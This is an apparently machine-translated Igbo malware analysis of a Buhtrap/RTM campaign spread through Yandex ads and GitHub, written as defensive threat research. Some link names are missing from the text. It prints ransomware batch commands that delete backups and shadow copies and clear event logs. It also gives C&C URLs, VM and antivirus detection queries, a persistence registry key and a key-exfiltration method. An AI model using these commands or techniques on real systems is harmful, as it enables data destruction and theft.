Iji nwaa ndị na-edekọ ego na mwakpo cyber, ị nwere ike iji akwụkwọ ọrụ ha na-achọ n'ịntanetị. Nke a bụ ihe otu cyber otu na-eme n'ime ọnwa ole na ole gara aga, na-ekesa azụ azụ ama ama. и , yana ndị na-ezoro ezo na ngwanrọ maka izu ohi ego crypto. Ọtụtụ ebumnuche dị na Russia. Emere mwakpo ahụ site n'itinye mgbasa ozi ọjọọ na Yandex.Direct. A duziri ndị nwere ike ọ metụtara na webụsaịtị ebe a gwara ha ka ha budata faịlụ ọjọọ nke emere ka ọ bụrụ ndebiri akwụkwọ. Yandex wepụrụ mgbasa ozi ọjọọ mgbe ịdọ aka ná ntị anyị gasịrị.
A tọhapụrụ koodu isi mmalite Buhtrap na ntanetị n'oge gara aga ka onye ọ bụla nwee ike iji ya. Anyị enweghị ozi gbasara nnweta koodu RTM.
Na post a, anyị ga-agwa gị ka ndị mwakpo ahụ si kesaa malware site na iji Yandex.Direct wee kwado ya na GitHub. Ozi ahụ ga-emechi site na nyocha teknụzụ nke malware.
Buhtrap na RTM alaghachila azụ ahịa
Usoro nke mgbasa na ndị metụtara
Ngwongwo akwụ ụgwọ dị iche iche ewegara ndị ihe metụtara na-ekekọrịta usoro mgbasa ozi nkịtị. Edobere faịlụ ọjọọ niile nke ndị mwakpo ahụ mere na ebe nchekwa GitHub abụọ dị iche iche.
Na-emekarị, ebe nchekwa ahụ nwere otu faịlụ ọjọọ enwere ike nbudata, nke na-agbanwe ugboro ugboro. Ebe ị nwere ike ịlele akụkọ mgbanwe na ebe nchekwa na GitHub, anyị nwere ike ịhụ ụdị malware ekesara n'oge ụfọdụ. Iji mee ka onye ahụ a tara ahụhụ budata faịlụ ọjọọ ahụ, a na-eji weebụsaịtị blanki-shabloni24[.]ru, nke egosiri na foto dị n'elu.
Nhazi nke saịtị na aha niile nke faịlụ obi ọjọọ na-agbaso otu echiche - ụdị, ndebiri, nkwekọrịta, ihe atụ, wdg N'iburu n'uche na Buhtrap na RTM software ejirilarị ọgụ na ndị na-edekọ ego n'oge gara aga, anyị chere na atụmatụ na mkpọsa ọhụrụ bụ otu ihe ahụ. Naanị ajụjụ bụ ka onye a tara ahụhụ si banye na webụsaịtị ndị mwakpo ahụ.
Ọrịa
Opekempe, ọtụtụ ndị nwere ike ọ metụtara bụ ndị kwụsịrị na saịtị a bụ ndị mgbasa ozi ọjọọ dọtara mmasị. N'okpuru bụ URL ọmụmaatụ:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Dịka ị na-ahụ site na njikọ ahụ, ezigara ọkọlọtọ ahụ na ọgbakọ ndekọ ego ziri ezi bb.f2[.]kz. Ọ dị mkpa iburu n'obi na ọkọlọtọ pụtara na saịtị dị iche iche, ha niile nwere otu mgbasa ozi id (blanki_rsya), na ọtụtụ metụtara ọrụ ndekọ ego ma ọ bụ enyemaka iwu. URL ahụ na-egosi na onye nwere ike ime ya jiri arịrịọ "ụdị nbudata akwụkwọ ọnụahịa," nke na-akwado echiche anyị nke mbuso agha ezubere iche. N'okpuru bụ saịtị ebe ọkọlọtọ pụtara na ajụjụ ọchụchọ kwekọrọ.
- budata akwụkwọ ọnụahịa - bb.f2[.]kz
- sample nkwekọrịta - Ipopen[.] ru
- ngwa mkpesa sample - 77metrov[.] ru
- akwụkwọ nkwekọrịta - blank-dogovor-kupli-prodazhi[.]ru
- arịrịọ ụlọikpe sample - zen.yandex[.] ru
- mkpesa sample - yurday[.] ru
- ụdị nkwekọrịta sample – Regforum[.] ru
- akwụkwọ nkwekọrịta - assistentus[.]ru
- nkwekọrịta ụlọ sample - napravah[.] com
- ihe atụ nke nkwekọrịta iwu - avito[.] ru
Enwere ike ịhazi saịtị blanki-shabloni24[.] ru ka ọ gafere nleba anya dị mfe. Dịka, mgbasa ozi na-arụtụ aka na saịtị ọkachamara nwere njikọ na GitHub adịghị ka ihe doro anya na ọ dị njọ. Na mgbakwunye, ndị mwakpo ahụ bugoro faịlụ ọjọọ na ebe nchekwa naanị maka obere oge, ikekwe n'oge mkpọsa ahụ. Ọtụtụ oge, ebe nchekwa GitHub nwere ebe nchekwa zip efu ma ọ bụ faịlụ EXE efu. Ya mere, ndị na-awakpo nwere ike kesaa mgbasa ozi site na Yandex.Direct na saịtị ndị o yikarịrị ka ndị na-edekọ ego bịara na nzaghachi na ajụjụ ọchụchọ kpọmkwem.
Ọzọ, ka anyị leba anya n'ụgwọ dị iche iche ekesara n'ụzọ dị otu a.
Ịkwụ ụgwọ Analysis
Chronology nke nkesa
Mgbasa ozi ọjọọ ahụ malitere na njedebe nke October 2018 ma na-arụ ọrụ n'oge ederede. Ebe ebe nchekwa ahụ niile dị na GitHub, anyị chịkọtara usoro iheomume ziri ezi nke nkesa ezinụlọ malware isii dị iche iche (lee foto dị n'okpuru). Anyị agbakwunyela ahịrị na-egosi mgbe achọpụtara njikọ ọkọlọtọ, dị ka ESET telemetry tụrụ atụ, maka atụnyere akụkọ git. Dị ka ị na-ahụ, nke a na-ejikọta nke ọma na nnweta nke ụgwọ ọrụ na GitHub. Enwere ike ịkọwa ọdịiche dị na njedebe nke February site n'eziokwu na anyị enweghị akụkụ nke mgbanwe mgbanwe n'ihi na e wepụrụ ebe nchekwa na GitHub tupu anyị enwee ike nweta ya n'uju.
Ọgụgụ 1. Ọgụgụ oge nke nkesa malware.
Asambodo nbanye koodu
Mgbasa ozi ahụ ji ọtụtụ asambodo. Ụfọdụ ezinụlọ nwere ihe karịrị otu malware bịanyere aka na ya, nke na-egosikwa na ihe nlele dị iche iche bụ nke otu mkpọsa ahụ. N'agbanyeghị na enwere igodo nkeonwe, ndị na-arụ ọrụ abanyeghị na ọnụọgụ abụọ n'usoro ma ejighị igodo ahụ maka nlele niile. N'ọgwụgwụ Febụwarị 2019, ndị mwakpo malitere ịmepụta mbinye aka na-ezighi ezi site na iji asambodo Google nwere nke ha na-enweghị igodo nzuzo.
Asambodo niile etinyere na mkpọsa ahụ yana ezinụlọ malware ha binyere aka ka edepụtara na tebụl dị n'okpuru.
Anyị ejirila asambodo nbanye koodu ndị a iji guzobe njikọ na ezinụlọ malware ndị ọzọ. Maka ọtụtụ asambodo, anyị ahụghị ihe nlele na-ekesaghị site na ebe nchekwa GitHub. Otú ọ dị, a na-eji akwụkwọ TOV "MARIYA" bịanye aka na malware nke botnet , adware na ndị na-egwuputa ihe. O yighị ka malware a metụtara mkpọsa a. O yikarịrị ka a zụtara asambodo ahụ na darknet.
Win32/Filecoder.Buhtrap
Akụkụ mbụ dọọrọ mmasị anyị bụ Win32/Filecoder.Buhtrap achọpụtara ọhụrụ. Nke a bụ faịlụ ọnụọgụ abụọ Delphi nke a na-akpakọ mgbe ụfọdụ. Ekesara ya na Febụwarị – Maachị 2019. Ọ na-akpa àgwà ka dabara na mmemme ransomware - ọ na-enyocha draịva mpaghara yana nchekwa netwọkụ wee zoo faịlụ achọpụtara. Ọ dịghị mkpa ka e mebie njikọ Ịntanetị n'ihi na ọ dịghị akpọtụrụ ihe nkesa iji zipu igodo nzuzo. Kama, ọ na-agbakwunye “token” na njedebe nke ozi mgbapụta ahụ, ma na-atụ aro iji email ma ọ bụ Bitmessage kpọtụrụ ndị ọrụ.
Iji zoo ọtụtụ ihe ndị nwere mmetụta dị ka o kwere mee, Filecoder.Buhtrap na-eme eriri emebere iji mechie ngwanrọ igodo nwere ike ịnwe ndị na-ahụ maka faịlụ mepere emepe nwere ozi bara uru nke nwere ike igbochi izo ya ezo. Usoro ebumnuche bụ tumadi sistemụ njikwa nchekwa data (DBMS). Na mgbakwunye, Filecoder.Buhtrap na-ehichapụ faịlụ ndekọ na ndabere iji mee ka mgbake data sie ike. Iji mee nke a, mee ihe odide batch n'okpuru.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap na-eji ọrụ ntanetị IP Logger ziri ezi emebere iji nakọta ozi gbasara ndị ọbịa webụsaịtị. Ezubere nke a iji soro ndị ihe mgbapụta ahụ metụtara, nke bụ ọrụ nke ahịrị iwu:
mshta.exe "javascript:document.write('');"
A na-ahọrọ faịlụ maka izo ya ezo ma ọ bụrụ na ha adabaghị na ndepụta mwepu atọ. Nke mbụ, faịlụ ndị nwere ndọtị ndị a adịghị ezoro ezo: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys na .bat. Nke abuo, faịlụ niile nke ụzọ zuru oke nwere eriri ndekọ sitere na listi dị n'okpuru ka ewepụrụ.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Nke atọ, ewepụrụ aha faịlụ ụfọdụ na izo ya ezo, n'etiti ha aha faịlụ nke ozi mgbapụta ahụ. Edepụtara ndepụta a n'okpuru. N'ụzọ doro anya, ewezuga ihe ndị a niile bụ iji mee ka igwe na-arụ ọrụ, mana na-enwe obere ntozu ụzọ.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Atụmatụ nzuzo faịlụ
Ozugbo emechara, malware na-ewepụta ụzọ igodo RSA 512-bit. A na-eji igodo ọha nwere koodu siri ike 2048-bit (ọnụọgụ ọha na modulus), zlib juru n'ọnụ, yana base64 kpuchiri exponent (d) na modulus (n). E gosipụtara koodu maka nke a na eserese 2.
Ọgụgụ 2. Nsonaazụ nbibi nke Hex-Rays nke usoro ọgbọ isi ụzọ 512-bit RSA.
N'okpuru ebe a bụ ọmụmaatụ nke ederede dị larịị nwere igodo nzuzo ewepụtara, nke bụ akara agbakwunyere na ozi mgbapụta ahụ.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Enyere igodo ọha nke ndị mwakpo ahụ n'okpuru.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
A na-ezobe faịlụ ndị ahụ site na iji AES-128-CBC yana igodo 256-bit. Maka faịlụ ọ bụla ezoro ezo, a na-emepụta igodo ọhụrụ na vector mmalite ọhụrụ. A na-agbakwunye ozi isi na njedebe nke faịlụ ezoro ezo. Ka anyị tụlee usoro nke faịlụ ezoro ezo.
Faịlụ ezoro ezo nwere nkụnye eji isi mee ndị a:
A na-ezobe data faịlụ isi iyi yana mgbakwunye nke uru anwansi VEGA na 0x5000 nke mbụ. A na-agbakwunye ozi ntọhapụ niile na faịlụ nwere usoro a:
- Ihe nrịbama nha faịlụ nwere akara na-egosi ma faịlụ ahụ ọ buru ibu karịa 0x5000 bytes n'ogo.
- AES igodo blob = ZlibCompress (RSAEncrypt ( igodo AES + IV, igodo ọha nke ụzọ igodo RSA emepụtara))
- RSA igodo blob = ZlibCompress (RSAEncrypt (igodo nzuzo RSA emepụtara, igodo ọha RSA nwere koodu siri ike))
Win32/ClipBanker
Win32/ClipBanker bụ akụrụngwa ekesara obere oge site na ngwụcha Ọktoba ruo mbido Disemba 2018. Ọrụ ya bụ nyochaa ọdịnaya nke clipboard, ọ na-achọ adreesị nke obere akpa cryptocurrency. N'ịbụ onye kpebiworo adreesị akpa ego ezubere iche, ClipBanker jiri adreesị chere na ọ bụ nke ndị ọrụ dochie ya. Ihe nlele ndị anyị nyochara enweghị igbe ma ọ bụ kpuchie ya. Naanị usoro eji ekpuchi omume bụ izo ya ezo eriri. A na-ezobe adreesị obere akpa onye ọrụ site na iji RC4. Ezubere ego cryptocurrencies bụ Bitcoin, Bitcoin cash, Dogecoin, Ethereum na Ripple.
N'ime oge malware ahụ na-agbasa na obere akpa Bitcoin ndị na-awakpo, a na-ezigara obere ego na VTS, nke na-eme ka obi abụọ na-enwe ọganihu nke mgbasa ozi ahụ. Na mgbakwunye, enweghị ihe akaebe na-egosi na azụmahịa ndị a metụtara ClipBanker ma ọlị.
Win32/RTM
E kesara akụrụngwa Win32/RTM ruo ọtụtụ ụbọchị na mbido Maachị 2019. RTM bụ Trojan banker nke edere na Delphi, ezubere maka sistemụ ụlọ akụ dịpụrụ adịpụ. Na 2017, ndị nchọpụta ESET bipụtara nke mmemme a, nkọwa ahụ ka dị mkpa. Na Jenụwarị 2019, Palo Alto Networks ewepụtara .
Buhtrap Loader
Ruo oge ụfọdụ, ihe nbudata dị na GitHub na-adịchaghị ka ngwa Buhtrap gara aga. Ọ tụgharịrị https://94.100.18[.]67/RSS.php?<some_id> iji nweta ọkwa ọzọ ma buru ya ozugbo na ebe nchekwa. Anyị nwere ike ịmata ọdịiche dị n'àgwà abụọ nke koodu ogbo nke abụọ. Na URL nke mbụ, RSS.php gafere Buhtrap backdoor ozugbo - ọnụ ụzọ azụ a yiri nke dị mgbe agbachara koodu isi mmalite.
N'ụzọ na-akpali mmasị, anyị na-ahụ ọtụtụ mkpọsa na Buhtrap backdoor, na-ebo ebubo na-agba ọsọ site dị iche iche ọrụ. N'okwu a, isi ihe dị iche bụ na a na-ebuba azụ azụ ozugbo na ebe nchekwa ma ghara iji atụmatụ a na-emebu na usoro ntinye DLL nke anyị kwuru banyere ya. . Na mgbakwunye, ndị na-arụ ọrụ gbanwere igodo RC4 ejiri ezoro okporo ụzọ netwọk na sava C&C. N'ọtụtụ mkpọsa anyị ahụla, ndị na-arụ ọrụ enyeghị nsogbu ịgbanwe igodo a.
Omume nke abụọ, nke siri ike karị bụ na RSS.php URL ka e bufere n'aka onye ọzọ. O mebere ụfọdụ ihe mgbochi, dị ka iwulite tebụl mbubata dị ike. Ebumnuche nke bootloader bụ ịkpọtụrụ sava C&C [.]com/api/F27F84EDA4D13B15/2, zipu ndekọ ma chere nzaghachi. Ọ na-edozi nzaghachi dị ka blob, na-ebunye ya na ebe nchekwa ma na-eme ya. Ọnụ ego a na-akwụ ụgwọ anyị hụrụ na-arụ ọrụ nke a bụ otu Buhtrap azụ azụ, mana enwere ike ịnwe ihe ndị ọzọ.
Android/Spy.Banker
N'ụzọ na-akpali mmasị, a hụkwara otu akụrụngwa maka gam akporo na ebe nchekwa GitHub. Ọ nọ na ngalaba isi naanị otu ụbọchị - Nọvemba 1, 2018. Ewezuga ikesa ya na GitHub, telemetry ESET ahụghị ihe akaebe ọ bụla na-ekesa malware a.
A kwadoro akụrụngwa a dị ka ngwugwu ngwa gam akporo (APK). Ekpuchiri ya nke ukwuu. Ezochiri omume ọjọọ ahụ n'ime JAR ezoro ezo nke dị na APK. Eji RC4 ezoro ya site na iji igodo a:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Otu igodo na algọridim ka a na-eji ezobe eriri. JAR dị na APK_ROOT + image/files. Nke mbụ 4 bytes nke faịlụ nwere ogologo nke ezoro ezo JAR, nke na-amalite ozugbo ogologo ubi.
N'ịbụ onye mebisịrị faịlụ ahụ, anyị chọpụtara na ọ bụ Anubis - na mbụ onye ọrụ banki maka Android. malware nwere atụmatụ ndị a:
- Ndekọ igwe okwu
- na-ewere nseta ihuenyo
- na-enweta nhazi GPS
- keylogger
- izo ya ezo data ngwaọrụ na ihe mgbapụta chọrọ
- na-eziga spam
N'ụzọ na-akpali mmasị, onye na-akụ akụ na-eji Twitter dịka ọwa nkwurịta okwu ndabere iji nweta ihe nkesa C&C ọzọ. Ihe nlele anyị nyochara jiri akaụntụ @JonesTrader, mana n'oge nyocha, egbochilarị ya.
The banker nwere ndepụta lekwasịrị ngwa na gam akporo ngwaọrụ. Ọ dị ogologo karịa ndepụta a nwetara na ọmụmụ Sophos. Ndepụta a gụnyere ọtụtụ ngwa ụlọ akụ, mmemme ịzụ ahịa n'ịntanetị dị ka Amazon na eBay, yana ọrụ cryptocurrency.
MSIL/ClipBanker.IH
Akụkụ ikpeazụ ekesara dị ka akụkụ nke mkpọsa a bụ .NET Windows executable, nke pụtara na Maachị 2019. Eji ConfuserEx v1.0.0 chịkọba ọtụtụ n'ime nsụgharị ndị a mụrụ. Dịka ClipBanker, akụrụngwa a na-eji bọọdụ. Ihe mgbaru ọsọ ya bụ ọtụtụ ego crypto, yana onyinye na Steam. Na mgbakwunye, ọ na-eji ọrụ IP Logger zuru ohi igodo WIF nkeonwe Bitcoin.
Usoro nchekwa
Na mgbakwunye na uru nke ConfuserEx na-enye n'igbochi nbibi, mkpofu na imebi ihe, akụkụ ahụ gụnyere ikike ịchọpụta ngwaahịa antivirus na igwe mebere.
Iji chọpụta na ọ na-agba ọsọ na igwe mebere, malware na-eji ahịrị iwu Windows WMI arụnyere arụnyere (WMIC) ịrịọ ozi BIOS, ya bụ:
wmic bios
Mgbe ahụ mmemme ahụ tụgharịrị mmepụta iwu wee chọọ isi okwu: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Iji chọpụta ngwaahịa antivirus, malware na-eziga arịrịọ Windows Management Instrumentation (WMI) na Windows Security Center site na iji ManagementObjectSearcher API dị ka egosiri n'okpuru. Mgbe emechara mkpebi site na base64 oku a dị ka nke a:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Ọgụgụ 3. Usoro maka ịchọpụta ngwaahịa antivirus.
Na mgbakwunye, malware na-enyocha ma , ngwá ọrụ iji chebe megide mwakpo clipboard na, ọ bụrụ na ọ na-agba ọsọ, na-akwụsịtụ eri niile na usoro ahụ, si otú ahụ gbanyụọ nchebe ahụ.
Nkwụsi ike
Ụdị malware anyị mụrụ n'onwe ya %APPDATA%googleupdater.exe wee tọọ njirimara “zoro ezo” maka ndekọ google. Mgbe ahụ, ọ na-agbanwe uru SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell na Windows ndekọ na-agbakwụnye ụzọ updater.exe. N'ụzọ dị otú a, malware ga-egbu oge ọ bụla onye ọrụ batara.
Omume ọjọọ
Dị ka ClipBanker, malware na-enyocha ọdịnaya nke clipboard wee na-achọ adreesị akpa ego cryptocurrency, ma mgbe achọtara ya, jiri otu adreesị onye ọrụ dochie ya. N'okpuru ebe a bụ ndepụta nke adreesị ebumnuche dabere na ihe ahụrụ na koodu ahụ.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Maka ụdị adreesị nke ọ bụla enwere okwu oge niile kwekọrọ. A na-eji uru STEAM_URL na-awakpo sistemu Steam, dịka enwere ike ịhụ site na okwu oge niile nke a na-eji kọwaa na nchekwa:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Ọwa exfiltration
Na mgbakwunye na dochie adreesị na nchekwa, malware na-elekwasị anya igodo WIF nke Bitcoin, Bitcoin Core na Electrum Bitcoin wallets. Mmemme a na-eji plogger.org dị ka ọwa exfiltration iji nweta igodo nzuzo WIF. Iji mee nke a, ndị na-arụ ọrụ na-agbakwunye data igodo nzuzo na onye ọrụ-Agent HTTP nkụnye eji isi mee, dị ka egosiri n'okpuru.
Ọgụgụ 4. IP Logger console na data mmepụta.
Ndị na-arụ ọrụ ejighị iplogger.org emepụ obere akpa. O nwere ike ịbụ na ha malitere usoro dị iche n'ihi njedebe agwa 255 n'ọhịa User-Agentegosiri na IP Logger web interface. N'ihe atụ ndị anyị mụrụ, echekwara ihe nkesa mmepụta ọzọ na mgbanwe gburugburu ebe obibi DiscordWebHook. N'ụzọ dị ịtụnanya, a naghị ekenye mgbanwe gburugburu ebe a ebe ọ bụla na koodu. Nke a na-egosi na malware ka na-etolite ma kenye mgbanwe ahụ na igwe nyocha nke onye ọrụ.
Enwere ihe ịrịba ama ọzọ na mmemme ahụ na-emepe emepe. Faịlụ ọnụọgụ abụọ gụnyere URL abụọ iplogger.org, a na-ajụkwa ha abụọ mgbe ewepụtara data. N'ịrịọ otu n'ime URL ndị a, uru dị na mpaghara Referer na-ebute ụzọ "DEV /". Anyị hụkwara ụdị nke na-ejighị ConfuserEx ngwugwu, onye nnata URL a bụ aha ya DevFeedbackUrl. Dabere na aha mgbanwe gburugburu ebe obibi, anyị kwenyere na ndị na-arụ ọrụ na-eme atụmatụ iji ọrụ Discord ziri ezi na sistemụ ntanetị weebụ ya zuru ohi wallet cryptocurrency.
nkwubi
Mgbasa ozi a bụ ihe atụ nke iji ọrụ mgbasa ozi ziri ezi na mwakpo cyber. Atụmatụ a na-elekwasị anya na òtù ndị Russia, ma ọ gaghị eju anyị anya ịhụ mwakpo dị otú ahụ site na iji ọrụ ndị na-abụghị ndị Russia. Iji zere imebi, ndị ọrụ ga-enwerịrị ntụkwasị obi na aha isi iyi nke ngwanro ha na-ebudata.
Ndepụta zuru oke nke egosi nkwenye na njirimara MITER ATT&CK dị na .
isi: www.habr.com